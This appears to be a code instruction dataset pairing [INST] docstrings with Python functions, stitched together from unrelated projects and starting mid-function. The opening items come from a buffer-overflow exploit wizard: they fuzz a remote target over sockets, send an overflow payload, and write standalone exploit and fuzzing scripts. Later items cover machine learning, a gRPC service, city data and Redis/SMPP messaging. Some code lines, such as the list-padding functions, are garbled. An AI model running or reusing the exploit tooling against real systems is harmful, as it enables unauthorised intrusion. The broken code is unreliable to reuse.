line.split(' ') + if len(splitted) > 5: + name = splitted[4] + if platform in name: + if arch == 'x86' and 'x64' not in name: + print(name) + elif arch == 'x64' and 'x86' not in name: + print(name) + os.unlink(tmp_file) +[INST] Shows all ASCII characters in a matrix (helps finding bad chars). [/INST] def show_ascii(): + hexed = char_string.hex() + listed = [hexed[i:i + 2] for i in range(0, len(hexed), 2)] + cols = 16 + lines = (" ".join(listed[i:i + cols]) for i in range(0, len(listed), cols)) + print('\n') + print('\n'.join(lines)) +[INST] Asks the user if the remote exploit should be run automatically. [/INST] def run_remote_exploit(): + show_prompt_text('You can check and run the exploit file manually or press Enter to let the wizard run it.') + show_prompt_text('Enter "skip" to proceed without running the file.', False) + if get_input(check_text) == 'skip': + return + else: + send_exploit() +[INST] Sends a request with the payload for a remote buffer overflow. [/INST] def send_exploit(): + try: + with so.socket(so.AF_INET, so.SOCK_STREAM) as s: + s.settimeout(5) + print_info('Connecting to {}'.format(target)) + connect = s.connect_ex((target, port)) + if connect != 0: + print_error('Connection failed') + return + try: + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + print_info('Sending evil request with {} bytes'.format(len(buffer))) + s.send(buffer) + print_success('Done') + except so.timeout: + print_error('Connection failed due to socket timeout') + except (BrokenPipeError, ConnectionResetError): + print_error('The connection was closed while sending the payload') +[INST] Asks the user if the remote exploit should be run automatically. [/INST] def run_remote_fuzzing(): + show_prompt_text('You can check and run the fuzzing file manually or press Enter to let the wizard run it.') + show_prompt_text('Enter "skip" to proceed without running the file.', False) + if get_input(check_text) == 'skip': + return + else: + send_fuzzing() + print_info('Fuzzing finished') +[INST] Sends requests with increasing payloads to cause a remote buffer overflow. [/INST] def send_fuzzing(): + build_fuzz_buffer() + try: + for item in fuzz_buffer: + with so.socket(so.AF_INET, so.SOCK_STREAM) as s: + s.settimeout(5) + print_info('Connecting to ' + target) + connect = s.connect_ex((target, port)) + if connect != 0: + print_error('Connection failed') + return + try: + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + command = start_command + item + end_command + print_info('Fuzzing with {} bytes'.format(len(command))) + s.send(command) + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + print_success('Done') + except so.timeout: + print_error('Connection failed due to socket timeout.') + return + except (BrokenPipeError, ConnectionResetError): + print_error('The connection was closed while sending the payload') +[INST] Creates a file with the payload for a local buffer overflow. [/INST] def dump_local_exploit(): + global file + global buffer + try: + with open(file, 'wb') as f: + f.write(buffer) + print_success('Created / modified file with length {}'.format(len(buffer))) + except OSError as ex: + print_error('Error while creating the exploit file:\n {}'.format(ex.strerror)) +[INST] Writes a python file with the exploit based on the currently set parameters. [/INST] def dump_remote_exploit(): + global file + content = """\ +#!/usr/bin/python3 +import socket as so +# --- Define target ------------------------ +target = '{target}' +port = {port} +# ------------------------------------------ +# --- Define exploit ------------------------ +buf_length = {buffer_length} +offset = {off} +{buffer_code} +# ------------------------------------------ +with so.socket(so.AF_INET, so.SOCK_STREAM) as s: + try: + s.settimeout(5) + print(' [*] Connecting to', target) + connect = s.connect_ex((target, port)) + # Stop script if connection cannot be established + if connect != 0: + print('[!] Connection failed') + exit(1) + # Connection established: send request + try: + # Catch initial response if any + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + print(' [*] Sending evil request with', len(buffer), 'bytes') + s.send(buffer) + print('[*] Done') + # Stop on timeout + except so.timeout: + print('[!] Connection failed due to socket timeout.') + exit(1) + except (BrokenPipeError, ConnectionResetError): + print('[!] The connection was closed while sending the payload') +""".format(target=target, + port=port, + buffer_length=buf_length, + off=offset, + buffer_code=buffer_list.selected_buffer.print_buffer()) + try: + with open(file, 'wb') as f: + f.write(content.encode()) + print_success('Created exploit file {}'.format(file)) + except OSError as ex: + print_error('Error while creating the exploit file:\n {}'.format(ex.strerror)) +[INST] Updates only the buffer in an existing exploit file. +Manual changes in other parts of the file will be retained.. [/INST] def update_remote_exploit(): + try: + with FileInput(files=[file], inplace=True) as f: + for line in f: + line = line.rstrip() + if line.startswith('offset = '): + line = "offset = " + str(offset) + elif line.startswith('buffer = '): + line = buffer_list.selected_buffer.print_buffer() + elif line.startswith('buffer += ') or len(line) == 0: + continue + print(line) + print_success('Updated buffer in exploit file {}'.format(file)) + except OSError as ex: + print_error('Error while updating the exploit file:\n {}'.format(ex.strerror)) +[INST] Generates the buffer for fuzzing based on the currently set parameters for +fuzz_length, fuzz_increase and fuzz_char. [/INST] def build_fuzz_buffer(): + counter = increase_step - len(start_command) - len(end_command) + while len(fuzz_buffer) <= fuzz_buff_length: + fuzz_buffer.append(fuzz_char * counter) + counter = counter + increase_step +[INST] Writes files with increasing size for fuzzing. [/INST] def dump_local_fuzz(): + build_fuzz_buffer() + for item in fuzz_buffer: + filename = file_name + '_' + str(len(item)) + '.' + file_ext + with open(filename, 'wb') as f: + f.write(start_command + item + end_command) + print_info('Created fuzzing file with length ' + str(len(item))) +[INST] Writes a python file for fuzzing based on the currently set parameters for fuzz_length, fuzz_increase and fuzz_char. [/INST] def dump_remote_fuzz(): + filename = 'fuzzing.py' + content = '''\ +#!/usr/bin/python3 +import socket as so +# --- Define target ------------------------ +target = '{target}' +port = {port} +# ------------------------------------------ +# --- Build fuzzing buffer ----------------- +fuzz_buffer = [] +counter = {step} - len({cmd}) - len({ecmd}) +while len(fuzz_buffer) <= {buff_len}: + fuzz_buffer.append({char}*counter) + counter = counter + {step} +# ------------------------------------------ +for item in fuzz_buffer: + with so.socket(so.AF_INET, so.SOCK_STREAM) as s: + try: + s.settimeout(5) + print(' [*] Connecting to', target) + connect = s.connect_ex((target, port)) + # Stop script if connection cannot be established + if connect != 0: + print('[!] Connection failed') + exit(1) + # Connection established: send request + try: + # Catch initial response if any + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + command = {cmd} + item + {ecmd} + print(' [*] Fuzzing with', len(command), 'bytes') + s.send(command) + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + print('[*] Done') + # Stop on timeout + except so.timeout: + print('[!] Connection failed due to socket timeout.') + exit(1) + except (BrokenPipeError, ConnectionResetError): + print('[!] The connection was closed while sending the payload') + exit(1) +'''.format(target=target, + port=port, + step=increase_step, + buff_len=fuzz_buff_length, + char=fuzz_char, + cmd=start_command, + ecmd=end_command) + try: + with open(filename, 'w') as f: + f.write(content) + print_success('Created fuzzing file {}'.format(filename)) + except OSError as ex: + print_error('Error while creating the fuzzing file:\n {}'.format(ex.strerror)) +[INST] Prints ingredients for making `count` arepas. +F-string of original code. [/INST] def ingredients(count): + print(f'{count*0.1} cups arepa flour') + print(f'{count*0.1} cups cheese') + print(f'{count*0.025} cups water') +[INST] Train the word2vec model for document vector representation.. [/INST] def fit(self, X, y=None): + self.sentences = X + self.word2vec = gensim.models.Word2Vec(MySentences(self.sentences), *self.args, **self.kwargs) + self.model = dict(zip(self.word2vec.wv.index2word, self.word2vec.wv.vectors)) + tfidf = TfidfVectorizer(analyzer=lambda x: x) + tfidf.fit(X) + max_idf = max(tfidf.idf_) + self.word2weight = defaultdict( + lambda: max_idf, + [(w, tfidf.idf_[i]) for w, i in tfidf.vocabulary_.items()] + ) + return self +[INST] Transform a sequence of documents to vectors.. [/INST] def transform(self, X, y=None): + return np.array([ + np.mean([self.model[w] * self.word2weight[w] + for w in words if w in self.model] or + [np.random.rand(self.size)], axis=0) + for words in MySentences(X) + ]) +[INST] Combine `fit` and `transform` functions. +It trains the model on the given data then transforming +and returning the training data into vectors.. [/INST] def fit_transform(self, X, y=None): + temp = self.fit(X) + return temp.transform(X) +[INST] Treats gRPC inputs and assembles lua command. Specifically, checks if required field have been specified, +if the values and types are correct and, for each input/input_type adds the argument to the lua command.. [/INST] def treat_inputs(self, request, arguments, created_images): + model_path = self.model_dir + file_index_str = "" + image_path = "" + for field, values in arguments.items(): + default = values[2] + try: + arg_value = eval("request.{}".format(field)) + except Exception as e: + log.error(e) + return False + print("Received request.{} = ".format(field)) + print(arg_value) + if field == "input": + log.debug("Treating input image field.") + assert(request.input != ""), "Input image field should not be empty." + try: + image_path, file_index_str = \ + service.treat_image_input(arg_value, self.input_dir, "{}".format(field)) + print("Image path: {}".format(image_path)) + created_images.append(image_path) + except Exception as e: + log.error(e) + raise + elif field == "model": + log.debug("Treating model field. Forcing model to be ESRGAN.") + model_path += self.esrgan_model + elif field == "scale": + log.debug("Treating scale field. Forcing scale to be 4.") + scale = 4 + model_path += str(scale) + else: + log.error("Request field not found.") + return False + if image_path == "": + log.error("Empty image_path (filename). Something went wrong when treating input.") + model_path += self.model_suffix + log.debug("Successfully treated input.") + return image_path, model_path, file_index_str +[INST] Increases the resolution of a given image (request.image). [/INST] def increase_image_resolution(self, request, context): + created_images = [] + arguments = {"input": ("image", True, None), + "model": ("string", True, None), + "scale": ("int", False, 4)} + try: + image_path, model_path, file_index_str = self.treat_inputs(request, arguments, created_images) + except HTTPError as e: + error_message = "Error downloading the input image \n" + e.read() + log.error(error_message) + self.result.data = error_message + return self.result + except Exception as e: + log.error(e) + self.result.data = e + return self.result + log.debug("Treated input.") + with Pool(1) as p: + try: + output = p.apply(_increase_image_resolution, (model_path, image_path)) + except Exception as e: + log.error(e) + self.result.data = e + return self.result + log.debug("Returning on service complete!") + input_filename = os.path.split(created_images[0])[1] + log.debug("Input file name: {}".format(input_filename)) + output_image_path = self.output_dir + '/' + input_filename + log.debug("Output image path: {}".format(output_image_path)) + try: + cv2.imwrite(output_image_path, output) + created_images.append(output_image_path) + except Exception as e: + log.error("Error writing output image to file.") + log.error(e) + self.result.data = e + return self.result + if input_filename.split('.')[1] == 'png': + log.debug("Encoding from PNG.") + self.result.data = service.png_to_base64(output_image_path).decode("utf-8") + else: + log.debug("Encoding from JPG.") + self.result.data = service.jpg_to_base64(output_image_path, open_file=True).decode("utf-8") + log.debug("Output image generated. Service successfully completed.") + for image in created_images: + service.serviceUtils.clear_file(image) + return self.result +[INST] The gRPC serve function. +Params: +max_workers: pool of threads to execute calls asynchronously +port: gRPC server port + +Add all your classes to the server here. +(from generated .py files by protobuf compiler). [/INST] def serve(max_workers=5, port=7777): + server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers)) + grpc_bt_grpc.add_SuperResolutionServicer_to_server( + SuperResolutionServicer(), server) + server.add_insecure_port('[::]:{}'.format(port)) + log.debug("Returning server!") + return server +[INST] Load the PyTorch model from the `model_dir` directory.. [/INST] def model_fn(model_dir): + print("Loading model.") + model_info = {} + model_info_path = os.path.join(model_dir, 'model_info.pth') + with open(model_info_path, 'rb') as f: + model_info = torch.load(f) + print("model_info: {}".format(model_info)) + device = torch.device("cuda" if torch.cuda.is_available() else "cpu") + INPUT_DIM = model_info['INPUT_DIM'] + WORD_EMBEDDING_DIM = model_info['WORD_EMBEDDING_DIM'] + N_FILTERS = model_info['N_FILTERS'] + FILTER_SIZES = model_info['FILTER_SIZES'] + AUTHOR_DIM = model_info['AUTHOR_DIM'] + DROPOUT = model_info['DROPOUT'] + PAD_IDX = model_info['PAD_IDX'] + model = CNN(INPUT_DIM, WORD_EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, \ + AUTHOR_DIM, DROPOUT, PAD_IDX) + model_path = os.path.join(model_dir, 'model_state.pt') + with open(model_path, 'rb') as f: + model.load_state_dict(torch.load(f)) + word_dict_path = os.path.join(model_dir, 'word_dict.pkl') + with open(word_dict_path, 'rb') as f: + model.word_dict = pickle.load(f) + model.to(device).eval() + print("Done loading model.") + return model, model_info['TRAIN_HISTORY'] +[INST] Load the PyTorch model from the `model_dir` directory.. [/INST] def model_fn(model_dir): + print("Loading model.") + model_info = {} + model_info_path = os.path.join(model_dir, 'model_info.pth') + with open(model_info_path, 'rb') as f: + model_info = torch.load(f) + print("model_info: {}".format(model_info)) + device = torch.device("cuda" if torch.cuda.is_available() else "cpu") + INPUT_DIM = model_info['INPUT_DIM'] + WORD_EMBEDDING_DIM = model_info['WORD_EMBEDDING_DIM'] + N_FILTERS = model_info['N_FILTERS'] + FILTER_SIZES = model_info['FILTER_SIZES'] + AUTHOR_DIM = model_info['AUTHOR_DIM'] + DROPOUT = model_info['DROPOUT'] + PAD_IDX = model_info['PAD_IDX'] + model = CNN(INPUT_DIM, WORD_EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, AUTHOR_DIM, DROPOUT, PAD_IDX) + print("Model loaded with embedding_dim {}, vocab_size {}.".format( + WORD_EMBEDDING_DIM, INPUT_DIM)) + model_path = os.path.join(model_dir, 'model_state.pt') + with open(model_path, 'rb') as f: + model.load_state_dict(torch.load(f)) + word_dict_path = os.path.join(model_dir, 'word_dict.pkl') + with open(word_dict_path, 'rb') as f: + model.word_dict = pickle.load(f) + model.to(device).eval() + print("Done loading model.") + return model +[INST] ls list to be cut/padded to length n. [/INST] def pad_to_n(ls, n = FIX_WORD_LENGTH): + ls= ls[:n] + if len(ls)']*(n-len(ls))) + ls + return ls +[INST] Gets wordlend of a poem, +if larger than SPLIT_INTO partions into next paragraph +return author, title and poem broken in this way. [/INST] def poem_fragments(poem_series, split_into): + poem = poem_series + poem_author = poem.author + poem_title = poem.title + poem_content = poem.content + poem_pa= poem.content.split('.\n') + i=0 + while ((i+1)!=(len(poem_pa))): + if (len(poem_pa[i].split())>=split_into): + poem_pa[i]=poem_pa[i]+'.\n' + i+=1 + else: + poem_pa[i] = poem_pa[i]+'.\n'+poem_pa[i+1] + del poem_pa[i+1] + return (poem_author, poem_title ,poem_pa) +[INST] ls list to be cut/padded to length n. [/INST] def slice_and_pad_to_n(ls, n): + ls= ls[:n] + if len(ls)']*(n-len(ls))) + ls + return ls +[INST] List to tockens +word_dict: dictionary of tokens +token_list: word list. [/INST] def tokenize_poem(token_list, word_dict): + aux =[word_dict[w] if w in word_dict else word_dict[''] for w in token_list] + return aux +[INST] poem extract as list +word_length: final word length of poems +token_dict: tokens dictionary +tokenized_poems: tokenized poems. [/INST] def tokenize_pad_slice_poems(data, word_length, word_dict): + data = [slice_and_pad_to_n(p, word_length) for p in data] + tokenized_poems = [tokenize_poem(p ,word_dict) for p in data] + return tokenized_poems +[INST] data : poems list created by spacy and torchtext +word_length: fix poems to have this number of tokens (not only words) +data_dir: dir to store data_dir +file_name: file name to store data. [/INST] def process_and_save(data, word_length, word_dict, data_dir, file_name): + data_list = [i.content for i in data.examples] + labels_list = [i.author_label for i in data.examples] + poems_list = tokenize_pad_slice_poems(data_list, word_length, word_dict) + path_to_file = os.path.join(data_dir, file_name) + with open(path_to_file, 'wb') as f: + pickle.dump((poems_list,labels_list), f) +[INST] Visualizes coordinates in dataframe on map +Retrieves columns with name latitude and logitude and visualizes it on a map.. [/INST] def visualize_coordinates(df: pd.DataFrame, latitude: str, longitude: str) -> None : + fig = px.scatter_mapbox(df, lat=latitude, lon=longitude, + color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10, + mapbox_style="carto-positron") + fig.show() +[INST] Fetches the data for a city if the data is not yet cashed on the computer.. [/INST] def fetch_data_city(city: str) -> None: + compression = ".xz" + folder = os.path.join(".","data") + def file_path(file_name: str) -> str: + return os.path.join(folder, file_name) + if not(os.path.exists(folder)): + os.mkdir(folder) + tiles_path = file_path(f'{city}Tiles.pkl{compression}') + hourly_dem_path = file_path(f'{city}HourlyDemographics.pkl{compression}') + hourly_density_path = file_path(f'{city}HourlyDensity.pkl{compression}') + daily_density_path = file_path(f'{city}DensityDaily.pkl{compression}') + daily_demographics_path = file_path(f'{city}DemographicsDaily.pkl{compression}') + if not(os.path.isfile(tiles_path)): + tiles = get_tiles(get_municipalityID(city)[0]) + tiles.to_pickle(tiles_path) + else: + tiles = pd.read_pickle(tiles_path) + if not(os.path.isfile(hourly_dem_path)): + hourly_dem = get_hourly_demographics_dataframe(tiles['tileID'].to_numpy()) + hourly_dem.to_pickle(hourly_dem_path) + if not(os.path.isfile(hourly_density_path)): + hourly_dens = get_hourly_density_dataframe(tiles['tileID'].to_numpy()) + hourly_dens.to_pickle(hourly_density_path) + if not(os.path.isfile(daily_density_path)): + get_daily_density(tiles['tileID'].to_numpy()).to_pickle(daily_density_path) + if not(os.path.isfile(daily_demographics_path)): + get_daily_demographics(tiles['tileID'].to_numpy()).to_pickle(daily_demographics_path) +[INST] Cleans the list of cities by removing all the cities that are not found in the +official list of cities provided by the Federal Statisitics Office. + +List of cities to check and clean. + +List containing a subset of the input list such that all elements are valid.. [/INST] def clean_cities_list(cities: [str]) -> [str]: + invalid_cities = [] + for c in cities: + if len(commune.loc[commune.GDENAME == c].GDENR.to_numpy()) == 0: + city = [] + sim_value = [] + for f in commune.GDENAME: + r = SequenceMatcher(None, c, f).ratio() + if r > 0.5: + city.append(f) + sim_value.append(r) + d = pd.DataFrame(data={"city": city, "value": sim_value}) + potential_cities = d.sort_values("value", ascending=False).head(5).city.to_numpy() + print(f"City nammed: {c} cannot be found in official records. Did you mean: {potential_cities} ? {c} will be ignored.") + invalid_cities.append(c) + return [c for c in cities if not(c in invalid_cities)] +[INST] Downloads the excel spreadsheet from the Swiss Federal Statistical Office that maps the town name to unique ID. [/INST] def download_commune_excel() -> None: + print('Beginning commune file download with requests') + folder = os.path.join(".","data") + if not(os.path.exists(folder)): + os.mkdir(folder) + url = 'https://www.bfs.admin.ch/bfsstatic/dam/assets/11467406/master' + r = requests.get(url) + with open(os.path.join(".", "data", 'commune.xlsx'), 'wb') as f: + f.write(r.content) + print("End of commune file download") +[INST] Assert that a redis operation returns the expected result.. [/INST] def assert_redis_op(self, redis, expected, op, *args, **kw): + raise NotImplementedError(".assert_redis_op() method not implemented.") +[INST] Assert that a redis operation raises an exception.. [/INST] def assert_redis_error(self, redis, op, *args, **kw): + raise NotImplementedError( + ".assert_redis_error() method not implemented.") +[INST] Wait some number of seconds, either for real or by advancing a clock.. [/INST] def wait(self, delay): + raise NotImplementedError(".wait() method not implemented.") +[INST] Perform an operation on both the fake and real Redises and assert that +the responses and errors are the same. + +This method is a generator and is not used directly. It's wrapped +with an appropriate sync/async wrapper in __init__() above.. [/INST] def _perform_operation_gen(self, op, *args, **kw): + results = [] + errors = [] + for redis in [self._fake_redis, self._real_redis]: + try: + result = yield getattr(redis, op)(*args, **kw) + except Exception as e: + errors.append(e) + if results != []: + self._test_case.fail( + "Fake redis returned %r but real redis raised %r" % ( + results[0], errors[0])) + else: + results.append(result) + if errors != []: + self._test_case.fail( + "Real redis returned %r but fake redis raised %r" % ( + results[0], errors[0])) + if errors: + fake_type, real_type = type(errors[0]), type(errors[1]) + if real_type is self._real_redis.RESPONSE_ERROR: + real_type = self._fake_redis.RESPONSE_ERROR + self._test_case.assertEqual( + fake_type, real_type, + ("Fake redis (a) and real redis (b) errors different:" + "\n a = %r\n b = %r") % tuple(errors)) + raise errors[0] + self._test_case.assertEqual( + results[0], results[1], + "Fake redis (a) and real redis (b) responses different:" + "\n a = %r\n b = %r" % tuple(results)) + returnValue(results[0]) +[INST] Check if this might be a delivery report with optional PDU parameters.. [/INST] def _handle_delivery_report_optional_params(self, pdu): + pdu_opts = unpacked_pdu_opts(pdu) + receipted_message_id = pdu_opts.get('receipted_message_id', None) + message_state = pdu_opts.get('message_state', None) + if receipted_message_id is None or message_state is None: + return succeed(False) + status = self.STATUS_MAP.get(message_state, 'UNKNOWN') + d = self.transport.handle_delivery_report( + receipted_message_id=receipted_message_id, + delivery_status=self.delivery_status(status), + smpp_delivery_status=status) + d.addCallback(lambda _: True) + return d +[INST] Construct and dispatch a delivery report based on content fields as +matched by our regex.. [/INST] def _process_delivery_report_content_fields(self, content_fields): + receipted_message_id = content_fields['id'] + message_state = content_fields['stat'] + return self.transport.handle_delivery_report( + receipted_message_id=receipted_message_id, + delivery_status=self.delivery_status(message_state), + smpp_delivery_status=message_state) +[INST] Check if the ``esm_class`` indicates that this is a delivery report. + +We assume the message content is a string that matches our regex. +We can't use the usual decoding process here because it lives +elsewhere and the content should be plain ASCII generated by the +SMSC anyway.. [/INST] def _handle_delivery_report_esm_class(self, pdu): + if not self.config.delivery_report_use_esm_class: + return succeed(False) + esm_class = pdu["body"]["mandatory_parameters"]["esm_class"] + if not (esm_class & self.ESM_CLASS_MASK): + return succeed(False) + content = pdu["body"]["mandatory_parameters"]["short_message"] + match = self.config.delivery_report_regex.search(content or '') + if not match: + self.log.warning( + ("esm_class %s indicates delivery report, but content" + " does not match regex: %r") % (esm_class, content)) + return succeed(True) + fields = match.groupdict() + d = self._process_delivery_report_content_fields(fields) + d.addCallback(lambda _: True) + return d +[INST] Call the appropriate `submit_*` method depending on config.. [/INST] def send_short_message(self, service, vumi_message_id, destination_addr, + content, data_coding=0, source_addr='', + optional_parameters=None): + kwargs = dict( + vumi_message_id=vumi_message_id, + destination_addr=destination_addr, + short_message=content, + data_coding=data_coding, + source_addr=source_addr, + optional_parameters=optional_parameters) + if self.config.send_long_messages: + kwargs['long_message'] = kwargs.pop('short_message') + return service.submit_sm_long(**kwargs) + elif self.config.send_multipart_sar: + kwargs['reference_rollover'] = ( + self.config.multipart_sar_reference_rollover) + return service.submit_csm_sar(**kwargs) + elif self.config.send_multipart_udh: + return service.submit_csm_udh(**kwargs) + return service.submit_sm(**kwargs) +[INST] Decorate a method that calls a manager. +This redecorates with the `call_decorator` attribute on the Manager +subclass used, which should be either @inlineCallbacks or +@flatten_generator.. [/INST] def calls_manager(manager_attr): + if callable(manager_attr): + return Manager.calls_manager('manager')(manager_attr) + def redecorate(func): + @wraps(func) + def wrapper(self, *args, **kw): + manager = getattr(self, manager_attr) + return manager.call_decorator(func)(self, *args, **kw) + return wrapper + return redecorate +[INST] Construct a manager from a dictionary of options.. [/INST] def from_config(cls, config): + client_config = config.copy() + manager_config = { + 'config': config.copy(), + 'key_prefix': client_config.pop('key_prefix', None), + 'key_separator': client_config.pop('key_separator', ':'), + } + fake_redis = client_config.pop('FAKE_REDIS', None) + if 'VUMITEST_REDIS_DB' in os.environ: + fake_redis = None + client_config['db'] = int(os.environ['VUMITEST_REDIS_DB']) + if fake_redis is not None: + if isinstance(fake_redis, cls): + fake_redis = fake_redis._client + if isinstance(fake_redis, FakeRedis): + pass + else: + fake_redis = None + return cls._fake_manager(fake_redis, manager_config) + return cls._manager_from_config(client_config, manager_config) +[INST] Construct a client from a dictionary of options.. [/INST] def _manager_from_config(cls, client_config, manager_config): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._manager_from_config(...)") +[INST] Delete *ALL* keys whose names start with this manager's key prefix. +Use only in tests.. [/INST] def _purge_all(self): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._purge_all()") +[INST] Make a redis API call using the underlying client library.. [/INST] def _make_redis_call(self, call, *args, **kw): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._make_redis_call()") +[INST] Filter results of a redis call.. [/INST] def _filter_redis_results(self, func, results): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._filter_redis_results()") +[INST] Generate a key using this manager's key prefix. [/INST] def _key(self, key): + if self._key_prefix is None: + return key + return "%s%s%s" % (self._key_prefix, self._key_separator, key) +[INST] Strip off manager's key prefix from a key. [/INST] def _unkey(self, key): + prefix = "%s%s" % (self._key_prefix, self._key_separator) + if key.startswith(prefix): + return key[len(prefix):] + return key +[INST] Return the result with some fake delay. If we're in async mode, add +some real delay to catch code that doesn't properly wait for the +deferred to fire.. [/INST] def _delay_operation(self, func, args, kw): + self.clock.advance(0.1) + if self._is_async: + d = Deferred() + delayed = reactor.callLater( + FAKE_REDIS_WAIT, call_to_deferred, d, func, self, *args, **kw) + self._delayed_calls.append(delayed) + return d + else: + return func(self, *args, **kw) +[INST] Sort keys in a consistent but non-obvious way. +We sort by the crc32 of the key, that being cheap and good enough for +our purposes here.. [/INST] def _sort_keys_by_hash(self, keys): + return sorted(keys, key=crc32) +[INST] Turn a vumi_date-formatted string into a string that sorts in reverse order +and can be turned back into a timestamp later. + +This is done by converting to a unix timestamp and subtracting it from +0xffffffffff (2**40 - 1) to get a number well outside the range +representable by the datetime module. The result is returned as a +hexadecimal string.. [/INST] def to_reverse_timestamp(vumi_timestamp): + timestamp = timegm(parse_vumi_date(vumi_timestamp).timetuple()) + return "%X" % (0xffffffffff - timestamp) +[INST] Add a key and timestamp to the manager.. [/INST] def add_key(self, key, timestamp): + if timestamp > self.start_timestamp: + self.new_keys.append((key, timestamp)) + return None + self.cache_keys.append((key, timestamp)) + if len(self.cache_keys) > self.key_count: + return self.cache_keys.pop(0) + return None +[INST] Check if a batch_id's cache values need to be reconciled with +what's stored in the MessageStore.. [/INST] def needs_reconciliation(self, batch_id, delta=0.01): + inbound = float((yield self.batch_inbound_count(batch_id))) + cached_inbound = yield self.cache.count_inbound_message_keys( + batch_id) + if inbound and (abs(cached_inbound - inbound) / inbound) > delta: + returnValue(True) + outbound = float((yield self.batch_outbound_count(batch_id))) + cached_outbound = yield self.cache.count_outbound_message_keys( + batch_id) + if outbound and (abs(cached_outbound - outbound) / outbound) > delta: + returnValue(True) + returnValue(False) +[INST] Rebuild the cache for the given batch. +The ``start_timestamp`` parameter is used for testing only.. [/INST] def reconcile_cache(self, batch_id, start_timestamp=None): + if start_timestamp is None: + start_timestamp = format_vumi_date(datetime.utcnow()) + yield self.cache.clear_batch(batch_id) + yield self.cache.batch_start(batch_id) + yield self.reconcile_outbound_cache(batch_id, start_timestamp) + yield self.reconcile_inbound_cache(batch_id, start_timestamp) +[INST] Rebuild the inbound message cache.. [/INST] def reconcile_inbound_cache(self, batch_id, start_timestamp): + key_manager = ReconKeyManager( + start_timestamp, self.cache.TRUNCATE_MESSAGE_KEY_COUNT_AT) + key_count = 0 + index_page = yield self.batch_inbound_keys_with_addresses(batch_id) + while index_page is not None: + for key, timestamp, addr in index_page: + yield self.cache.add_from_addr(batch_id, addr) + old_key = key_manager.add_key(key, timestamp) + if old_key is not None: + key_count += 1 + index_page = yield index_page.next_page() + yield self.cache.add_inbound_message_count(batch_id, key_count) + for key, timestamp in key_manager: + try: + yield self.cache.add_inbound_message_key( + batch_id, key, self.cache.get_timestamp(timestamp)) + except: + log.err() +[INST] Rebuild the outbound message cache.. [/INST] def reconcile_outbound_cache(self, batch_id, start_timestamp): + key_manager = ReconKeyManager( + start_timestamp, self.cache.TRUNCATE_MESSAGE_KEY_COUNT_AT) + key_count = 0 + status_counts = defaultdict(int) + index_page = yield self.batch_outbound_keys_with_addresses(batch_id) + while index_page is not None: + for key, timestamp, addr in index_page: + yield self.cache.add_to_addr(batch_id, addr) + old_key = key_manager.add_key(key, timestamp) + if old_key is not None: + key_count += 1 + sc = yield self.get_event_counts(old_key[0]) + for status, count in sc.iteritems(): + status_counts[status] += count + index_page = yield index_page.next_page() + yield self.cache.add_outbound_message_count(batch_id, key_count) + for status, count in status_counts.iteritems(): + yield self.cache.add_event_count(batch_id, status, count) + for key, timestamp in key_manager: + try: + yield self.cache.add_outbound_message_key( + batch_id, key, self.cache.get_timestamp(timestamp)) + yield self.reconcile_event_cache(batch_id, key) + except: + log.err() +[INST] Update the event cache for a particular message.. [/INST] def reconcile_event_cache(self, batch_id, message_id): + event_keys = yield self.message_event_keys(message_id) + for event_key in event_keys: + event = yield self.get_event(event_key) + yield self.cache.add_event(batch_id, event) +[INST] Has the message search issue a `batch_inbound_keys_matching()` +query and stores the resulting keys in the cache ordered by +descending timestamp.. [/INST] def find_inbound_keys_matching(self, batch_id, query, ttl=None, + wait=False): + assert isinstance(self.manager, TxRiakManager), ( + "manager is not an instance of TxRiakManager") + token = yield self.cache.start_query(batch_id, 'inbound', query) + deferred = self.batch_inbound_keys_matching(batch_id, query) + deferred.addCallback( + lambda keys: self.cache.store_query_results(batch_id, token, keys, + 'inbound', ttl)) + if wait: + yield deferred + returnValue(token) +[INST] Has the message search issue a `batch_outbound_keys_matching()` +query and stores the resulting keys in the cache ordered by +descending timestamp.. [/INST] def find_outbound_keys_matching(self, batch_id, query, ttl=None, + wait=False): + token = yield self.cache.start_query(batch_id, 'outbound', query) + deferred = self.batch_outbound_keys_matching(batch_id, query) + deferred.addCallback( + lambda keys: self.cache.store_query_results(batch_id, token, keys, + 'outbound', ttl)) + if wait: + yield deferred + returnValue(token) +[INST] Count the number of keys in the token's result set.. [/INST] def count_keys_for_token(self, batch_id, token): + return self.cache.count_query_results(batch_id, token) +[INST] Return True or False depending on whether or not the query is +still running. [/INST] def is_query_in_progress(self, batch_id, token): + return self.cache.is_query_in_progress(batch_id, token) +[INST] Return all inbound message keys with (and ordered by) timestamps.. [/INST] def batch_inbound_keys_with_timestamps(self, batch_id, max_results=None, + start=None, end=None, + with_timestamps=True): + formatter = key_with_ts_only_formatter if with_timestamps else None + return self._query_batch_index( + self.inbound_messages, batch_id, 'batches_with_addresses', + max_results, start, end, formatter) +[INST] Return all outbound message keys with (and ordered by) timestamps.. [/INST] def batch_outbound_keys_with_timestamps(self, batch_id, max_results=None, + start=None, end=None, + with_timestamps=True): + formatter = key_with_ts_only_formatter if with_timestamps else None + return self._query_batch_index( + self.outbound_messages, batch_id, 'batches_with_addresses', + max_results, start, end, formatter) +[INST] Return all inbound message keys with (and ordered by) timestamps and +addresses.. [/INST] def batch_inbound_keys_with_addresses(self, batch_id, max_results=None, + start=None, end=None): + return self._query_batch_index( + self.inbound_messages, batch_id, 'batches_with_addresses', + max_results, start, end, key_with_ts_and_value_formatter) +[INST] Return all outbound message keys with (and ordered by) timestamps and +addresses.. [/INST] def batch_outbound_keys_with_addresses(self, batch_id, max_results=None, + start=None, end=None): + return self._query_batch_index( + self.outbound_messages, batch_id, 'batches_with_addresses', + max_results, start, end, key_with_ts_and_value_formatter) +[INST] Return all inbound message keys with timestamps and addresses. +Results are ordered from newest to oldest.. [/INST] def batch_inbound_keys_with_addresses_reverse(self, 